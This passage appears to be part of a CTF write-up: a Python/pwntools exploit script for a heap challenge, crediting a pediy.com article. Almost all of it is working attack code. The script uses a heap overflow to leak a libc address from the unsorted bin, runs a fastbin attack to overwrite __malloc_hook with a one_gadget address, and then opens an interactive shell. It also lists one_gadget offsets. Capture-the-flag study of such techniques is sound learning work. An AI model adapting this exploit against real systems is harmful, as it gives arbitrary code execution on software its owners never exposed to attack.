update(0, 0x49, b'\x00' * 0x48 + b'\xa1')  # overflow: chunk 1's size becomes 0xa1
delete(1)                                  # chunk 1 goes into the unsorted bin
input('delete chunk1')
gdb.attach(cn)
allocate(0x40)  # splits chunk 1; the 0x50 remainder (slot 2's memory) stays in the unsorted bin while slot 2 keeps flag == 1
input('create chunk1, chunk2 in unsortedbin')
gdb.attach(cn)
view(2)
ru(b'Content: \n')
leak_addr = uu64(r(6))                     # fd of the remainder: &main_arena + 88
success('leak_addr:' + hex(leak_addr))
libc_base = leak_addr - 88 - 0x3c4b20      # 0x3c4b20 = main_arena offset in the challenge's libc.so.6
success('libc_base:' + hex(libc_base))
allocate(0x40)  # 4: takes the remainder out of the unsorted bin (same memory as slot 2)
update(4, 0x40, b'a' * 0x40)
update(2, 0x10, b'b' * 0x10)

# fastbin attack towards __malloc_hook
allocate(0x60)  # 5 (chunk size 0x70)
delete(5)       # fastbin[0x70] -> chunk 5
input('delete chunk5')
gdb.attach(cn)
fake_chunk = leak_addr - 88 - 0x2b - 8     # __malloc_hook - 0x23; its size field reads as 0x7f
payload = b'a' * 0x40 + p64(0) + p64(0x70) + p64(fake_chunk)
update(3, len(payload), payload)           # overflow from chunk 3 into chunk 5's header: fd = fake_chunk
allocate(0x60)  # 5 again; fastbin[0x70] now points at fake_chunk
input('create chunk5')
gdb.attach(cn)
allocate(0x60)  # 6: calloc returns fake_chunk + 0x10 = __malloc_hook - 0x13
one_gadget = libc_base + 0x4526a
success('one_gadget:' + hex(one_gadget))
update(6, 0x13 + 8, b'c' * 0x13 + p64(one_gadget))  # overwrite __malloc_hook
input('update chunk6 to one_gadget')
allocate(0x10)  # calloc calls __malloc_hook -> one_gadget
'''
one_gadget libc.so.6
0x45216
0x4526a
0xf02a4
0xf1147
'''
irt()


This post draws on the following article:

https://bbs.pediy.com/thread-247381.htm
